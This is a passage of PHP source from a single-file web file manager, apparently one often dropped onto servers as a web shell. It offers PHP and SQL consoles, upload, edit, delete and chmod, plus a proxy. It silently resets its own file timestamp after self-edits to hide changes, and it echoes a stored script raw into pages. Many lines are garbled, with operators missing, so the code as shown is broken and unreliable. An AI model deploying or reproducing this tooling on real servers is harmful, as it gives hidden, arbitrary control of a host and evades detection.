$_GET['fm_settings'])) {
    echo 

<table class="whole">
<form method="post" action="">
<tr><th colspan="2">'
.__('File manager').' - '.__('Settings').'</th></tr>
'
.(empty($msg)?'':'<tr><td class="row2" colspan="2">'.$msg.'</td></tr>').'
'
.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').'
'
.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').'
'
.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').'
'
.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').'
'
.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').'
'
.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').'
'
.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').'
'
.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').'
'
.fm_config_checkbox_row(__('Show').' xls','show_xls').'
'
.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').'
'
.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').'
<tr><td class="row1"><input name="fm_config[sql_server]" value="'
.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr>
<tr><td class="row1"><input name="fm_config[sql_username]" value="'
.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr>
<tr><td class="row1"><input name="fm_config[sql_password]" value="'
.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr>
<tr><td class="row1"><input name="fm_config[sql_db]" value="'
.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr>
'
.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').'
'
.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').'
'
.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').'
'
.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').'
'
.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').'
<tr><td class="row3"><a href="'
.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr>
</form>
</table>
<table>
<form method="post" action="">
<tr><th colspan="2">'
.__('Settings').' - '.__('Authorization').'</th></tr>
<tr><td class="row1"><input name="fm_login[authorize]" value="1" '
.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr>
<tr><td class="row1"><input name="fm_login[login]" value="'
.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr>
<tr><td class="row1"><input name="fm_login[password]" value="'
.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr>
<tr><td class="row1"><input name="fm_login[cookie_name]" value="'
.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr>
<tr><td class="row1"><input name="fm_login[days_authorization]" value="'
.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr>
<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'
.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'
.__('Save').'" ></td></tr>
</form>
</table>'
;
echo 
fm_tpl_form('php'),fm_tpl_form('sql');
} elseif (isset(
$proxy_form)) {
    die(
$proxy_form);
} elseif (isset(
$res_lng)) {    
?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php
    
if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php');
    else echo 
'</h2></td><td>'.fm_run_input('sql');
    
?></td></tr></table></td>
</tr>
<tr>
    <td class="row1">
        <a href="<?=$url_inc.'&path=' $path;?>"><?=__('Back')?></a>
        <form action="" method="POST" name="console">
        <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/>
        <input type="reset" value="<?=__('Reset')?>">
        <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run">
<?php
$str_tmpl 
$res_lng.'_templates';
$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : '';
if (!empty(
$tmpl)){
    
$active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : '';
    
$select '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n";
    
$select .= '<option value="-1">' __('Select') . "</option>\n";
    foreach (
$tmpl as $key=>$value){
        
$select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n";
    }
    
$select .= "</select>\n";
    echo 
$select;
}
?>
        </form>
    </td>
</tr>
</table>
<?php
    
if (!empty($res)) {
        
$fun='fm_'.$res_lng;
        echo 
'<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>';
    }
} elseif (!empty(
$_REQUEST['edit'])){
    if(!empty(
$_REQUEST['save'])) {
        
$fn $path $_REQUEST['edit'];
        
$filemtime filemtime($fn);
        if (
file_put_contents($fn$_REQUEST['newcontent'])) $msg .= __('File updated');
        else 
$msg .= __('Error occurred');
        if (
$_GET['edit']==basename(__FILE__)) {
            
touch(__FILE__,1415116371);
        } else {
            if (!empty(
$fm_config['restore_time'])) touch($fn,$filemtime);
        }
    }
    
$oldcontent = @file_get_contents($path $_REQUEST['edit']);
    
$editlink $url_inc '&edit=' $_REQUEST['edit'] . '&path=' $path;
    
$backlink $url_inc '&path=' $path;
?>
<table border='0' cellspacing='0' cellpadding='1' width="100%">
<tr>
    <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg?>
    </td>
</tr>
<tr>
    <td class="row1">
        <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a>
    </td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$editlink?>">
            <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea>
            <input type="submit" name="save" value="<?=__('Submit')?>">
            <input type="submit" name="cancel" value="<?=__('Cancel')?>">
        </form>
    </td>
</tr>
</table>
<?php
echo $auth['script'];
} elseif(!empty(
$_REQUEST['rights'])){
    if(!empty(
$_REQUEST['save'])) {
        if(
fm_chmod($path $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively']))
        
$msg .= (__('File updated')); 
        else 
$msg .= (__('Error occurred'));
    }
    
clearstatcache();
    
$oldrights fm_rights_string($path $_REQUEST['rights'], true);
    
$link $url_inc '&rights=' $_REQUEST['rights'] . '&path=' $path;
    
$backlink $url_inc '&path=' $path;
?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg?>
    </td>
</tr>
<tr>
    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
    </td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$link?>">
           <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>">
        <?php if (is_dir($path.$_REQUEST['rights'])) { ?>
            <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/>
        <?php ?>
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>
    </td>
</tr>
</table>
<?php
} elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') {
    if(!empty(
$_REQUEST['save'])) {
        
rename($path $_REQUEST['rename'], $path $_REQUEST['newname']);
        
$msg .= (__('File updated'));
        
$_REQUEST['rename'] = $_REQUEST['newname'];
    }
    
clearstatcache();
    
$link $url_inc '&rename=' $_REQUEST['rename'] . '&path=' $path;
    
$backlink $url_inc '&path=' $path;

?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg?>
    </td>
</tr>
<tr>
    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
    </td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$link?>">
            <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/>
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>
    </td>
</tr>
</table>
<?php
} else {
//Let's rock!
    
$msg '';
    if(!empty(
$_FILES['upload'])&&!empty($fm_config['upload_file'])) {
        if(!empty(
$_FILES['upload']['name'])){
            
$_FILES['upload']['name'] = str_replace('%'''$_FILES['upload']['name']);
            if(!
move_uploaded_file($_FILES['upload']['tmp_name'], $path $_FILES['upload']['name'])){
                
$msg .= __('Error occurred');
            } else {
                
$msg .= __('Files uploaded').': '.$_FILES['upload']['name'];
            }
        }
    } elseif(!empty(
$_REQUEST['delete'])&&$_REQUEST['delete']<>'.') {
        if(!
fm_del_files(($path $_REQUEST['delete']), true)) {
            
$msg .= __('Error occurred');
        } else {
            
$msg .= __('Deleted').' '.$_REQUEST['delete'];
        }
    } elseif(!empty(
$_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) {
        if(!@
mkdir($path $_REQUEST['dirname'],0777)) {
            
$msg .= __('Error occurred');
        } else {
            
$msg .= __('Created').' '.$_REQUEST['dirname'];
        }
    } elseif(!empty(
$_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) {
        if(!
$fp=@fopen($path $_REQUEST['filename'],"w")) {
            
$msg .= __('Error occurred');
        } else {
            
fclose($fp);
            
$msg .= __('Created').' '.$_REQUEST['filename'];
        }
    } elseif (isset(
$_GET['zip'])) {
        
$source base64_decode($_GET['zip']);
        
$destination basename($source).'.zip';
        
set_time_limit(0);
        
$phar = new PharData($destination);
        
$phar->buildFromDirectory($source);
        if (
is_file($destination))
        
$msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
        
'.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '$destination)
        .
'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' $path.'" title="'.__('Delete').' '$destination.'" >'.__('Delete') . '</a>';
        else 
$msg .= __('Error occurred').': '.__('no files');
    } elseif (isset(
$_GET['gz'])) {
        
$source base64_decode($_GET['gz']);
        
$archive $source.'.tar';
        
$destination basename($source).'.tar';
        if (
is_file($archive)) unlink($archive);
        if (
is_file($archive.'.gz')) unlink($archive.'.gz');
        
clearstatcache();
        
set_time_limit(0);
        
//die();
        
$phar = new PharData($destination);
        
$phar->buildFromDirectory($source);
        
$phar->compress(Phar::GZ,'.tar.gz');
        unset(
$phar);
        if (
is_file($archive)) {
            if (
is_file($archive.'.gz')) {
                
unlink($archive); 
                
$destination .= '.gz';
            }

            
$msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
            
'.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '$destination)
            .
'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
        } else 
$msg .= __('Error occurred').': '.__('no files');
    } elseif (isset(
$_GET['decompress'])) {
        
// $source = base64_decode($_GET['decompress']);
        // $destination = basename($source);
        // $ext = end(explode(".", $destination));
        // if ($ext=='zip' OR $ext=='gz') {
            // $phar = new PharData($source);
            // $phar->decompress();
            // $base_file = str_replace('.'.$ext,'',$destination);
            // $ext = end(explode(".", $base_file));
            // if ($ext=='tar'){
                // $phar = new PharData($base_file);
                // $phar->extractTo(dir($source));
            // }
        // } 
        // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done');
    
} elseif (isset($_GET['gzfile'])) {
        
$source base64_decode($_GET['gzfile']);
        
$archive $source.'.tar';
        
$destination basename($source).'.tar';
        if (
is_file($archive)) unlink($archive);
        if (
is_file($archive.'.gz')) unlink($archive.'.gz');
        
set_time_limit(0);
        
//echo $destination;
        
$ext_arr explode('.',basename($source));
        if (isset(
$ext_arr[1])) {
            unset(
$ext_arr[0]);
            
$ext=implode('.',$ext_arr);
        } 
        
$phar = new PharData($destination);
        
$phar->addFile($source);
        
$phar->compress(Phar::GZ,$ext.'.tar.gz');
        unset(
$phar);
        if (
is_file($archive)) {
            if (
is_file($archive.'.gz')) {
                
unlink($archive); 
                
$destination .= '.gz';
            }
            
$msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
            
'.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '$destination)
            .
'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
        } else 
$msg .= __('Error occurred').': '.__('no files');
    }
?>
<table class="whole" id="header_table" >
<tr>
    <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th>
</tr>
<?php if(!empty($msg)){ ?>
<tr>
    <td colspan="2" class="row2"><?=$msg?></td>
</tr>
<?php ?>
<tr>
    <td class="row2">
        <table>
            <tr>
            <td>
                <?=fm_home()?>
            </td>
            <td>
            <?php if(!empty($fm_config['make_directory'])) { ?>
                <form method="post" action="<?=$url_inc?>">
                <input type="hidden" name="path" value="<?=$path?>" />
                <input type="text" name="dirname" size="15">
                <input type="submit" name="mkdir" value="<?=__('Make directory')?>">
                </form>
            <?php ?>
            </td>
            <td>
            <?php if(!empty($fm_config['new_file'])) { ?>
                <form method="post" action="<?=$url_inc?>">
                <input type="hidden" name="path" value="<?=$path?>" />
                <input type="text" name="filename" size="15">
                <input type="submit" name="mkfile" value="<?=__('New file')?>">
                </form>
            <?php ?>
            </td>
            <td>
            <?=fm_run_input('php')?>
            </td>
            <td>
            <?=fm_run_input('sql')?>
            </td>
            </tr>
        </table>
    </td>
    <td class="row3">
        <table>
        <tr>
        <td>
        <?php if (!empty($fm_config['upload_file'])) { ?>
            <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data">
            <input type="hidden" name="path" value="<?=$path?>" />
            <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" />
            <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" />
            <input type="submit" name="test" value="<?=__('Upload')?>" />
            </form>
        <?php ?>
        </td>
        <td>
        <?php if ($auth['authorize']) { ?>
            <form action="" method="post">&nbsp;&nbsp;&nbsp;
            <input name="quit" type="hidden" value="1">
            <?=__('Hello')?><?=$auth['login']?>
            <input type="submit" value="<?=__('Quit')?>">
            </form>
        <?php ?>
        </td>
        <td>
        <?=fm_lang_form($language)?>
        </td>
        <tr>
        </table>
    </td>
</tr>
</table>
<table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%">
<thead>
<tr> 
    <th style="white-space:nowrap"> <?=__('Filename')?> </th>
    <th style="white-space:nowrap"> <?=__('Size')?> </th>
    <th style="white-space:nowrap"> <?=__('Date')?> </th>
    <th style="white-space:nowrap"> <?=__('Rights')?> </th>
    <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th>
</tr>
</thead>
<tbody>
<?php
$elements 
fm_scan_dir($path'''all'true);
$dirs = array();
$files = array();
foreach (
$elements as $file){
    if(@
is_dir($path $file)){
        
$dirs[] = $file;
    } else {
        
$files[] = $file;
    }
}
natsort($dirs); natsort($files);
$elements array_merge($dirs$files);

foreach (
$elements as $file){
    
$filename $path $file;
    
$filedata = @stat($filename);
    if(@
is_dir($filename)){
        
$filedata[7] = '';
        if (!empty(
$fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename);
        
$link '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
        
$loadlink= (fm_root($file)||$phar_maybe) ? '' fm_link('zip',$filename,__('Compress').'&nbsp;zip',__('Archiving').' '$file);
        
$arlink  = (fm_root($file)||$phar_maybe) ? '' fm_link('gz',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '.$file);
        
$style 'row2';
         if (!
fm_root($file)) $alert 'onClick="if(confirm(\'' __('Are you sure you want to delete this directory (recursively)?').'\n /'$file'\')) document.location.href = \'' $url_inc '&delete=' $file '&path=' $path  '\'"'; else $alert '';
    } else {
        
$link 
            
$fm_config['show_img']&&@getimagesize($filename
            ? 
'<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\''
            
fm_img_link($filename)
            .
'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>'
            
'<a href="' $url_inc '&edit=' $file '&path=' $path'" title="' __('Edit') . '"><span class="file">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
        
$e_arr explode("."$file);
        
$ext end($e_arr);
        
$loadlink =  fm_link('download',$filename,__('Download'),__('Download').' '$file);
        
$arlink in_array($ext,array('zip','gz','tar')) 
        ? 
''
        
: ((fm_root($file)||$phar_maybe) ? '' fm_link('gzfile',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '$file));
        
$style 'row1';
        
$alert 'onClick="if(confirm(\''__('File selected').': \n'$file'. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' $url_inc '&delete=' $file '&path=' $path  '\'"';
    }
    
$deletelink fm_root($file) ? '' '<a href="#" title="' __('Delete') . ' '$file '" ' $alert '>' __('Delete') . '</a>';
    
$renamelink fm_root($file) ? '' '<a href="' $url_inc '&rename=' $file '&path=' $path '" title="' __('Rename') .' '$file '">' __('Rename') . '</a>';
    
$rightstext = ($file=='.' || $file=='..') ? '' '<a href="' $url_inc '&rights=' $file '&path=' $path '" title="' __('Rights') .' '$file '">' . @fm_rights_string($filename) . '</a>';
?>
<tr class="<?=$style?>"> 
    <td><?=$link?></td>
    <td><?=$filedata[7]?></td>
    <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td>
    <td><?=$rightstext?></td>
    <td><?=$deletelink?></td>
    <td><?=$renamelink?></td>
    <td><?=$loadlink?></td>
    <td><?=$arlink?></td>
</tr>
<?php
    
}
}
?>
</tbody>
</table>
<div class="row3"><?php
    $mtime 
explode(' 'microtime()); 
    
$totaltime $mtime[0] + $mtime[1] - $starttime
    echo 
fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a>  | <a href="'.fm_site_url().'">.</a>';
    if (!empty(
$fm_config['show_php_ver'])) echo ' | PHP '.phpversion();
    if (!empty(
$fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file();
    if (!empty(
$fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2);
    if (!empty(
$fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>';
    if (!empty(
$fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>';
    if (!empty(
$fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>';
    if (!empty(
$fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>';
    
?>
</div>
<script type="text/javascript">
function download_xls(filename, text) {
    var element = document.createElement('a');
    element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text);
    element.setAttribute('download', filename);
    element.style.display = 'none';
    document.body.appendChild(element);
    element.click();
    document.body.removeChild(element);
}

function base64_encode(m) {
    for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) {
        c = m.charCodeAt(l);
        if (128 > c) d = 1;
        else
            for (d = 2; c >= 2 << 5 * d;) ++d;
        for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])
    }
    b && (g += k[f << 6 - b]);
    return g
}


var tableToExcelData = (function() {
    var uri = 'data:application/vnd.ms-excel;base64,',
    template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>',
    format = function(s, c) {
            return s.replace(/{(\w+)}/g, function(m, p) {
                return c[p];
            })
        }
    return function(table, name) {
        if (!table.nodeType) table = document.getElementById(table)
        var ctx = {
            worksheet: name || 'Worksheet',
            table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1")
        }
        t = new Date();
        filename = 'fm_' + t.toISOString() + '.xls'
        download_xls(filename, base64_encode(format(template, ctx)))
    }
})();

var table2Excel = function () {

    var ua = window.navigator.userAgent;
    var msie = ua.indexOf("MSIE ");

    this.CreateExcelSheet = 
        function(el, name){
            if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer

                var x = document.getElementById(el).rows;

                var xls = new ActiveXObject("Excel.Application");

                xls.visible = true;
                xls.Workbooks.Add
                for (i = 0; i < x.length; i++) {
                    var y = x[i].cells;

                    for (j = 0; j < y.length; j++) {
                        xls.Cells(i + 1, j + 1).Value = y[j].innerText;
                    }
                }
                xls.Visible = true;
                xls.UserControl = true;
                return xls;
            } else {
                tableToExcelData(el, name);
            }
        }
}
</script>
</body>
</html>

<?php
//Ported from ReloadCMS project http://reloadcms.com
class archiveTar {
    var 
$archive_name '';
    var 
$tmp_file 0;
    var 
$file_pos 0;
    var 
$isGzipped true;
    var 
$errors = array();
    var 
$files = array();
    
    function 
__construct(){
        if (!isset(
$this->errors)) $this->errors = array();
    }
    
    function 
createArchive($file_list){
        
$result false;
        if (
file_exists($this->archive_name) && is_file($this->archive_name))     $newArchive false;
        else 
$newArchive true;
        if (
$newArchive){
            if (!
$this->openWrite()) return false;
        } else {
            if (
filesize($this->archive_name) == 0)    return $this->openWrite();
            if (
$this->isGzipped) {
                
$this->closeTmpFile();
                if (!
rename($this->archive_name$this->archive_name.'.tmp')){
                    
$this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp';
                    return 
false;
                }
                
$tmpArchive gzopen($this->archive_name.'.tmp''rb');
                if (!
$tmpArchive){
                    
$this->errors[] = $this->archive_name.'.tmp '.__('is not readable');
                    
rename($this->archive_name.'.tmp'$this->archive_name);
                    return 
false;
                }
                if (!
$this->openWrite()){
                    
rename($this->archive_name.'.tmp'$this->archive_name);
                    return 
false;
                }
                
$buffer gzread($tmpArchive512);
                if (!
gzeof($tmpArchive)){
                    do {
                        
$binaryData pack('a512'$buffer);
                        
$this->writeBlock($binaryData);
                        
$buffer gzread($tmpArchive512);
                    }
                    while (!
gzeof($tmpArchive));
                }
                
gzclose($tmpArchive);
                
unlink($this->archive_name.'.tmp');
            } else {
                
$this->tmp_file fopen($this->archive_name'r+b');
                if (!
$this->tmp_file)    return false;
            }
        }
        if (isset(
$file_list) && is_array($file_list)) {
        if (
count($file_list)>0)
            
$result $this->packFileArray($file_list);
        } else 
$this->errors[] = __('No file').__(' to ').__('Archive');
        if ((
$result)&&(is_resource($this->tmp_file))){
            
$binaryData pack('a512''');
            
$this->writeBlock($binaryData);
        }
        
$this->closeTmpFile();
        if (
$newArchive && !$result){
        
$this->closeTmpFile();
        
unlink($this->archive_name);
        }
        return 
$result;
    }

    function 
restoreArchive($path){
        
$fileName $this->archive_name;
        if (!
$this->isGzipped){
            if (
file_exists($fileName)){
                if (
$fp fopen($fileName'rb')){
                    
$data fread($fp2);
                    
fclose($fp);
                    if (
$data == '\37\213'){
                        
$this->isGzipped true;
                    }
                }
            }
            elseif ((
substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped true;
        } 
        
$result true;
        if (
$this->isGzipped$this->tmp_file gzopen($fileName'rb');
        else 
$this->tmp_file fopen($fileName'rb');
        if (!
$this->tmp_file){
            
$this->errors[] = $fileName.' '.__('is not readable');
            return 
false;
        }
        
$result $this->unpackFileArray($path);
            
$this->closeTmpFile();
        return 
$result;
    }

    function 
showErrors    ($message '') {
        
$Errors $this->errors;
        if(
count($Errors)>0) {
        if (!empty(
$message)) $message ' ('.$message.')';
            
$message __('Error occurred').$message.': <br/>';
            foreach (
$Errors as $value)
                
$message .= $value.'<br/>';
            return 
$message;    
        } else return 
'';
        
    }
    
    function 
packFileArray($file_array){
        
$result true;
        if (!
$this->tmp_file){
            
$this->errors[] = __('Invalid file descriptor');
            return 
false;
        }
        if (!
is_array($file_array) || count($file_array)<=0)
          return 
true;
        for (
$i 0$i<count($file_array); $i++){
            
$filename $file_array[$i];
            if (
$filename == $this->archive_name)
                continue;
            if (
strlen($filename)<=0)
                continue;
            if (!
file_exists($filename)){
                
$this->errors[] = __('No file').' '.$filename;
                continue;
            }
            if (!
$this->tmp_file){
            
$this->errors[] = __('Invalid file descriptor');
            return 
false;
            }
        if (
strlen($filename)<=0){
            
$this->errors[] = __('Filename').' '.__('is incorrect');;
            return 
false;
        }
        
$filename str_replace('\\''/'$filename);
        
$keep_filename $this->makeGoodPath($filename);
        if (
is_file($filename)){
            if ((
$file fopen($filename'rb')) == 0){
                
$this->errors[] = __('Mode ').__('is incorrect');
            }
                if((
$this->file_pos == 0)){
                    if(!
$this->writeHeader($filename$keep_filename))
                        return 
false;
                }
                while ((
$buffer fread($file512)) != ''){
                    
$binaryData pack('a512'$buffer);
                    
$this->writeBlock($binaryData);
                }
            
fclose($file);
        }    else 
$this->writeHeader($filename$keep_filename);
            if (@
is_dir($filename)){
                if (!(
$handle opendir($filename))){
                    
$this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable');
                    continue;
                }
                while (
false !== ($dir readdir($handle))){
                    if (
$dir!='.' && $dir!='..'){
                        
$file_array_tmp = array();
                        if (
$filename != '.')
                            
$file_array_tmp[] = $filename.'/'.$dir;
                        else
                            
$file_array_tmp[] = $dir;

                        
$result $this->packFileArray($file_array_tmp);
                    }
                }
                unset(
$file_array_tmp);
                unset(
$dir);
                unset(
$handle);
            }
        }
        return 
$result;
    }

    function 
unpackFileArray($path){ 
        
$path str_replace('\\''/'$path);
        if (
$path == ''    || (substr($path01) != '/' && substr($path03) != '../' && !strpos($path':')))    $path './'.$path;
        
clearstatcache();
        while (
strlen($binaryData $this->readBlock()) != 0){
            if (!
$this->readHeader($binaryData$header)) return false;
            if (
$header['filename'] == '') continue;
            if (
$header['typeflag'] == 'L'){            //reading long header
                
$filename '';
                
$decr floor($header['size']/512);
                for (
$i 0$i $decr$i++){
                    
$content $this->readBlock();
                    
$filename .= $content;
                }
                if ((
$laspiece $header['size'] % 512) != 0){
                    
$content $this->readBlock();
                    
$filename .= substr($content0$laspiece);
                }
                
$binaryData $this->readBlock();
                if (!
$this->readHeader($binaryData$header)) return false;
                else 
$header['filename'] = $filename;
                return 
true;
            }
            if ((
$path != './') && ($path != '/')){
                while (
substr($path, -1) == '/'$path substr($path0strlen($path)-1);
                if (
substr($header['filename'], 01) == '/'$header['filename'] = $path.$header['filename'];
                else 
$header['filename'] = $path.'/'.$header['filename'];
            }
            
            if (
file_exists($header['filename'])){
                if ((@
is_dir($header['filename'])) && ($header['typeflag'] == '')){
                    
$this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder');
                    return 
false;
                }
                if ((
is_file($header['filename'])) && ($header['typeflag'] == '5')){
                    
$this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists');
                    return 
false;
                }
                if (!
is_writeable($header['filename'])){
                    
$this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists');
                    return 
false;
                }
            } elseif ((
$this->dirCheck(($header['typeflag'] == '5' $header['filename'] : dirname($header['filename'])))) != 1){
                
$this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename'];
                return 
false;
            }

            if (
$header['typeflag'] == '5'){
                if (!
file_exists($header['filename']))        {
                    if (!
mkdir($header['filename'], 0777))    {
                        
                        
$this->errors[] = __('Cannot create directory').' '.$header['filename'];
                        return 
false;
                    } 
                }
            } else {
                if ((
$destination fopen($header['filename'], 'wb')) == 0) {
                    
